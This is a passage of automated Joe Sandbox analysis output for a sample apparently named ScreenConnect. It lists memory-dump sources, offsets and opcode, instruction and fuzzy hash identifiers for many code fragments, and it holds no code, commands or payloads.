                                                                                                                                                  • Instruction ID: e31f634cf5f95f7049b6d49f45d3b424bf8c5b4a19296fcc891c78a33ab704f6
                                                                                                                                                  • Opcode Fuzzy Hash: 18672ade46e518a4606383393483f89e704827381a6f768fcaa3007175e4f7a2
                                                                                                                                                  • Instruction Fuzzy Hash: B5113D30A002099FDB04DBA8D8819AEBBF5FF88214B508529E519AB311EB70ED05DB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 98bc5ec66bcca02020ec128404b0df58d06dbe6f22e320e3c53f3d8173dfd728
                                                                                                                                                  • Instruction ID: ab9714754be6776c55d4cfbd1f142c06adbd79f98eef2c1761aff74be10cb7da
                                                                                                                                                  • Opcode Fuzzy Hash: 98bc5ec66bcca02020ec128404b0df58d06dbe6f22e320e3c53f3d8173dfd728
                                                                                                                                                  • Instruction Fuzzy Hash: 2311427590010ADFCF01DFA4D9809DEBBF1FF49314B508159DA04BB261D775AE0ACB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 72af871b418839ef6f6ab474e481b6a63dce423983a3e0a68c75e2698c784567
                                                                                                                                                  • Instruction ID: ddf5a3ddd010394411091494430fc1ba65fd94ff14f7dc20a86ea1412e98be12
                                                                                                                                                  • Opcode Fuzzy Hash: 72af871b418839ef6f6ab474e481b6a63dce423983a3e0a68c75e2698c784567
                                                                                                                                                  • Instruction Fuzzy Hash: 2211E571E00205AFDF29CEA9D8906EEBBB6FFC4310F9485AAD514D7155D3728902CB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2442868892.0000000001CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CBD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1cbd000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                                  • Instruction ID: 643f0e498d10770837c3b7a700012bc3888b9ffc5f805c56fa118683f2fec004
                                                                                                                                                  • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                                  • Instruction Fuzzy Hash: 3B110376404284CFCB06CF44D9C4B66BF72FB84318F24C6A9D8094B257C33AD55ACBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 528bb5cbf725dc7a4f8fbe9c31d24361e338a465d91d626b4286aca1257b8c46
                                                                                                                                                  • Instruction ID: 76a0cbda2b27bb36451269b01653e73d7daa5c2f40efc9dcfb7bcf95d9203b00
                                                                                                                                                  • Opcode Fuzzy Hash: 528bb5cbf725dc7a4f8fbe9c31d24361e338a465d91d626b4286aca1257b8c46
                                                                                                                                                  • Instruction Fuzzy Hash: 6F2106B2804249DFDF10CF9AD444BDEFBF4EB48324F14842AD519A7240D7B9A545CFA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 98ef8e24c94148587ef07bd1fcf55c426ed4449ab11624b177a7bb62e2ef9281
                                                                                                                                                  • Instruction ID: e4dc12910099cb63a89e64672f2abc84448596373b6baef1af8e649f7b9b54d1
                                                                                                                                                  • Opcode Fuzzy Hash: 98ef8e24c94148587ef07bd1fcf55c426ed4449ab11624b177a7bb62e2ef9281
                                                                                                                                                  • Instruction Fuzzy Hash: C3115236A0050ADFCF01CF98D9808DEB7B1FF45714B558266D605BF222D675AE0BCB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a3cf56a84eb57d426e5c77befe359b48cdfb5933073205fd8ffb0189248f04f6
                                                                                                                                                  • Instruction ID: 3b90c815e01cd523bf09631f67d09d6c525d088531afc00eeac0ff276a1bdec6
                                                                                                                                                  • Opcode Fuzzy Hash: a3cf56a84eb57d426e5c77befe359b48cdfb5933073205fd8ffb0189248f04f6
                                                                                                                                                  • Instruction Fuzzy Hash: D611CE3190008DDBEF05DFA9D8408CCBBB2EF86324F488526D5057B241DB35A9478B90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0eacb4c17cdecb521af716f465ecf9682b537f41b573993c4c277d59019e47ed
                                                                                                                                                  • Instruction ID: 24dd3a21a83d17dc03233e08e419646b4b3c2c9e89efe1fd46120f8f4ddba5ff
                                                                                                                                                  • Opcode Fuzzy Hash: 0eacb4c17cdecb521af716f465ecf9682b537f41b573993c4c277d59019e47ed
                                                                                                                                                  • Instruction Fuzzy Hash: 6E018F763000148F8708DA6EF49496AF7AAFBD8661355857AE50AC7311CA32DC138754
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bff83f2a6031aebcc38ce6d8c44d47900964b245aa44370332c7cb5a62c28a2c
                                                                                                                                                  • Instruction ID: d0e499dc520438d0602b7325f5e5dee88882b2fa2e1a5e8d73abcd584a56acbb
                                                                                                                                                  • Opcode Fuzzy Hash: bff83f2a6031aebcc38ce6d8c44d47900964b245aa44370332c7cb5a62c28a2c
                                                                                                                                                  • Instruction Fuzzy Hash: 3611E170F00208AFDF28CA69D840AAFBBF6AFC8700F94C5A9D104D7244E7729901CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f33a771f0717d8b7d7982bd341b41edfb3eb8e7526c496d697456f8ec970eae0
                                                                                                                                                  • Instruction ID: 3348246040e1d27a8d6c99c52a9872c6a435e0662b11fc9c86376fe73d20a56c
                                                                                                                                                  • Opcode Fuzzy Hash: f33a771f0717d8b7d7982bd341b41edfb3eb8e7526c496d697456f8ec970eae0
                                                                                                                                                  • Instruction Fuzzy Hash: 0011D671A1421DDBDF15DBA8D864AEDBBB1AF89310F00146AD505BB3A0DB741944CBA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d67a40aa1344a04bc985bd5877da9e48d5e5b485b027fcc12ad9ed483825491b
                                                                                                                                                  • Instruction ID: 442e07dfeacda63e6a14b1be8781eb33f07b7150cfd5e6f1bdab0c3937467bab
                                                                                                                                                  • Opcode Fuzzy Hash: d67a40aa1344a04bc985bd5877da9e48d5e5b485b027fcc12ad9ed483825491b
                                                                                                                                                  • Instruction Fuzzy Hash: 0F114671A0004DDBCF05DFA8D5808ECBFB2FF86718B48C648E10AAB116CB31E946DB60
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 70909fad8bc60d6286c8e471f3d80df349836bf0596841bcec2d7777a10a3320
                                                                                                                                                  • Instruction ID: 5711cb4407aec82b9495d902c2c7476f152d61a569848da58f787f67b9b584b8
                                                                                                                                                  • Opcode Fuzzy Hash: 70909fad8bc60d6286c8e471f3d80df349836bf0596841bcec2d7777a10a3320
                                                                                                                                                  • Instruction Fuzzy Hash: 40113971914218DBDF15DFA8D8A4AEEBFB1EF49310F00042AD102BB3A0DE781D45CBA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 14c54b685731c873111da828c6380aa3c37490473ce0818ffcca77b621713aaf
                                                                                                                                                  • Instruction ID: 46ca99e3ed3533519b1b7af436854f1b21c4029522a89c4358c8974f10f9579b
                                                                                                                                                  • Opcode Fuzzy Hash: 14c54b685731c873111da828c6380aa3c37490473ce0818ffcca77b621713aaf
                                                                                                                                                  • Instruction Fuzzy Hash: 2D01F57120D384AFC7139B6EAC60557BFA9EE87610346849BD185CB263DA64BC09C761
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 14b4e9530e4908c56f265a399343a37bdcec75870db7903c80ff47bd97b2fb6a
                                                                                                                                                  • Instruction ID: 398bbbb8f49c05da48eedda6bb56f804b364790406ebea586e1e19fa0db1b75a
                                                                                                                                                  • Opcode Fuzzy Hash: 14b4e9530e4908c56f265a399343a37bdcec75870db7903c80ff47bd97b2fb6a
                                                                                                                                                  • Instruction Fuzzy Hash: 2211FE3590010ADFCF41DFA8D9409DEBBF5FF49314B508569D605BB251D771AE0ACB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0b99d34f70353d68b5462950c0693295474214497923923caf3508caa7be28cf
                                                                                                                                                  • Instruction ID: 2a952fa331b2f04daf618fd17f8f80fd0c53ee62c1800e4655b216c51252876a
                                                                                                                                                  • Opcode Fuzzy Hash: 0b99d34f70353d68b5462950c0693295474214497923923caf3508caa7be28cf
                                                                                                                                                  • Instruction Fuzzy Hash: EE01F932F042159B9F198A5DA81446BBBD9FFC8264715496EE509DB301EFB1DC028BD0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2442868892.0000000001CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CBD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1cbd000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c5ebe56e2d6df6fd80778c3494fbd13239220f0977248ba1f496e67ef0cb7f0d
                                                                                                                                                  • Instruction ID: e5eefbdcb7a3d2d0a5739737bc7e438790191006a8abcad0d4a2e6f6bf2afa1f
                                                                                                                                                  • Opcode Fuzzy Hash: c5ebe56e2d6df6fd80778c3494fbd13239220f0977248ba1f496e67ef0cb7f0d
                                                                                                                                                  • Instruction Fuzzy Hash: 53012D7240E3C09FE7128B259894762BFB4AF43224F19C0DBD9898F1A3C2699845C772
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2442868892.0000000001CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CBD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1cbd000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 219d5b8b1de401575ad499149c9ca1223e784b6d364d218b5f8016cbcdfe37b2
                                                                                                                                                  • Instruction ID: 1d73bc83f3dbee2c9a662e175465338f354d462b54f9ff6ef80fadfae74aacc6
                                                                                                                                                  • Opcode Fuzzy Hash: 219d5b8b1de401575ad499149c9ca1223e784b6d364d218b5f8016cbcdfe37b2
                                                                                                                                                  • Instruction Fuzzy Hash: 25012B71404340DAF7104E6AEDC4BB7BF98EF413A8F08C01AEE0A8B182C6B9D541C6B1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d2641fa9813b9cfbdd80ecbdc39639e6782e99c81da776297fa6e4bb00e55e99
                                                                                                                                                  • Instruction ID: 4893524ce11c6f42e2041a91fcf6a07c0afdcf817fd2fbb3e90ed455d1368d3d
                                                                                                                                                  • Opcode Fuzzy Hash: d2641fa9813b9cfbdd80ecbdc39639e6782e99c81da776297fa6e4bb00e55e99
                                                                                                                                                  • Instruction Fuzzy Hash: 1CF0499694E7C15FD703C228A8A1689BF25DBA3129F5A41DBD4858F0E3E518191B8362
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 94c9b0e4b63691964c5bb20dc22b72074b4fa8a21341829fe0958fad43e93f14
                                                                                                                                                  • Instruction ID: db9d36cc68b791a3ab4bb3451476e8b42017cf2819b2dad4ef0a90fcf1641944
                                                                                                                                                  • Opcode Fuzzy Hash: 94c9b0e4b63691964c5bb20dc22b72074b4fa8a21341829fe0958fad43e93f14
                                                                                                                                                  • Instruction Fuzzy Hash: F4F0FC723042456FDF015F946C509EF3FBBFF88264B004016FA05D7251DA319D1597A1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4035fe1822681ef8864b0134337866e486dad4d218c07480fef7f85af6c38d81
                                                                                                                                                  • Instruction ID: 85ec518995f78b5984bc197f003642404506095941e4ca989ddc8ec8f6d188fc
                                                                                                                                                  • Opcode Fuzzy Hash: 4035fe1822681ef8864b0134337866e486dad4d218c07480fef7f85af6c38d81
                                                                                                                                                  • Instruction Fuzzy Hash: 21012832D0015DDBCF05DFA9E9448CDBBB6EF89314F45852AE505B7251DB30A906CBA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: eff66460dd417787b5bdc2ec96f299b6d9820ea0e1c684a75f54da18e88f3a48
                                                                                                                                                  • Instruction ID: 663dfd236fcc350157f75639719800770a3ef27d9398e8a93acfe75ec848aa2c
                                                                                                                                                  • Opcode Fuzzy Hash: eff66460dd417787b5bdc2ec96f299b6d9820ea0e1c684a75f54da18e88f3a48
                                                                                                                                                  • Instruction Fuzzy Hash: 51F09771E01119AFCB41DFADD8819DEBBF9EF49214B108165E958E7211E371AA128BD0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cb18d4917fb77074c95c9129230557ee04f451440ab5e5bc0cba886cd9201aa0
                                                                                                                                                  • Instruction ID: 4c9a0c3c8ac6a1252058f13003725427b9b86d8f287764a916398eea2f16eea0
                                                                                                                                                  • Opcode Fuzzy Hash: cb18d4917fb77074c95c9129230557ee04f451440ab5e5bc0cba886cd9201aa0
                                                                                                                                                  • Instruction Fuzzy Hash: 8CF05836B092445ADB28CABEA400A9BBBDACBD8220B1480BFE94DC3740E831A4008764
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6664e266ea25e03d02450c363a4e9e6b6704b67a1e3b55c3f1750c198a62dc5d
                                                                                                                                                  • Instruction ID: ba54f7dc8cc70fa8b806f09a383685f4518efc933682b2f470be989d19d15e03
                                                                                                                                                  • Opcode Fuzzy Hash: 6664e266ea25e03d02450c363a4e9e6b6704b67a1e3b55c3f1750c198a62dc5d
                                                                                                                                                  • Instruction Fuzzy Hash: 87F0E976604244AFCB01CB09D840C9B7FAAEFD9324B14C06BF848C7252D931D9028774
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0f73ab8f28f23cf7c56dd8b57d98eeff80a3c42b024e8347b1d2df2181ca965f
                                                                                                                                                  • Instruction ID: 2c71a97ad17404b438db3bf7d67951953b6516b4ecb2e5bcb5834485f8619e8b
                                                                                                                                                  • Opcode Fuzzy Hash: 0f73ab8f28f23cf7c56dd8b57d98eeff80a3c42b024e8347b1d2df2181ca965f
                                                                                                                                                  • Instruction Fuzzy Hash: 93F0FA6A50E2E08FD7020BB8602A2D43FA0DD9355830800CFE2D5CF163E8228C0BCB60
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cd2bd80c0b5343923145368ead04253993bf6b580eb18e1650da19a472625554
                                                                                                                                                  • Instruction ID: fba1bdcec0a6fab391ce9bdcd68ca6b762397519275a0fa4a5bf8da6c0182067
                                                                                                                                                  • Opcode Fuzzy Hash: cd2bd80c0b5343923145368ead04253993bf6b580eb18e1650da19a472625554
                                                                                                                                                  • Instruction Fuzzy Hash: 62F0BB72648340DBC71557A874151DE3FA5FFE2251740446FE246CB245DD65DC068B91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ff862f8eb4d53f8d1e5877388cd87b7798093f8a50aadbe01c18ed149f3fecad
                                                                                                                                                  • Instruction ID: c46d73cf88792e796e1ca2794c5dfb5aea0280ec12e9ccaa610ca24cc78dd117
                                                                                                                                                  • Opcode Fuzzy Hash: ff862f8eb4d53f8d1e5877388cd87b7798093f8a50aadbe01c18ed149f3fecad
                                                                                                                                                  • Instruction Fuzzy Hash: D9F089363002196B9F055E989C509AF3FEBFFC8364B00402AFA05D3250DA719C11A7A5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: be73b01174d4c04c228ec3502e86985365e7b88f8fb46848cb7d98e08ccd68dc
                                                                                                                                                  • Instruction ID: 2c0870161a97a2e68d7975ae20b189b702cb2ca239479959ee7c365ea68869c4
                                                                                                                                                  • Opcode Fuzzy Hash: be73b01174d4c04c228ec3502e86985365e7b88f8fb46848cb7d98e08ccd68dc
                                                                                                                                                  • Instruction Fuzzy Hash: B3F0242250D2D15FEB2283B8B8512997FA0FED2214B8945CFD081CB553DA89EA0AC392
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7a0837209f3d147a9c52e026eeea143bd264a89465db19fd1c765850d74391d8
                                                                                                                                                  • Instruction ID: 413167750eacd069d3307fb2c1a791cc1699f3f1b5005c48a4a4487660806a6e
                                                                                                                                                  • Opcode Fuzzy Hash: 7a0837209f3d147a9c52e026eeea143bd264a89465db19fd1c765850d74391d8
                                                                                                                                                  • Instruction Fuzzy Hash: 10F02730700309AB9B11DB9FE89496BFFDAEFC8660341842AD619C7320DFA1FC058790
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 56b460384458f6ffff5def281be1e9eceec30fc5f1dd4a2bbd32b056e272d9e0
                                                                                                                                                  • Instruction ID: 0c354346cb74755a47deb6f7b3fa08b97a847b5819d00bc62e1e41727f44a3eb
                                                                                                                                                  • Opcode Fuzzy Hash: 56b460384458f6ffff5def281be1e9eceec30fc5f1dd4a2bbd32b056e272d9e0
                                                                                                                                                  • Instruction Fuzzy Hash: D3F0E5353043905BEB145E9A78E81AB7FEAFBC9A64F48006EE609C7342CD288C0B4760
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 574c46feab2157bbe66a22acd8370c307010b3fa6d1390efa8745c19a0a1072d
                                                                                                                                                  • Instruction ID: 0ae841345d6df3e6add9a296c8ed443b5e6230bb51e63dab0b186642beb66f60
                                                                                                                                                  • Opcode Fuzzy Hash: 574c46feab2157bbe66a22acd8370c307010b3fa6d1390efa8745c19a0a1072d
                                                                                                                                                  • Instruction Fuzzy Hash: 51F04930809289EFEF05DBA8E48529CBFB0FB45640F5040E9C505AB241DB385F45EB41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5cfe788a42b3faf8db85b3a9a98f083f1669b841b58c34f8090ec07c6a47674b
                                                                                                                                                  • Instruction ID: 0903811fe54e36a2818ea3f68e97e7d4a9c0ef775521e6fa3207487355971553
                                                                                                                                                  • Opcode Fuzzy Hash: 5cfe788a42b3faf8db85b3a9a98f083f1669b841b58c34f8090ec07c6a47674b
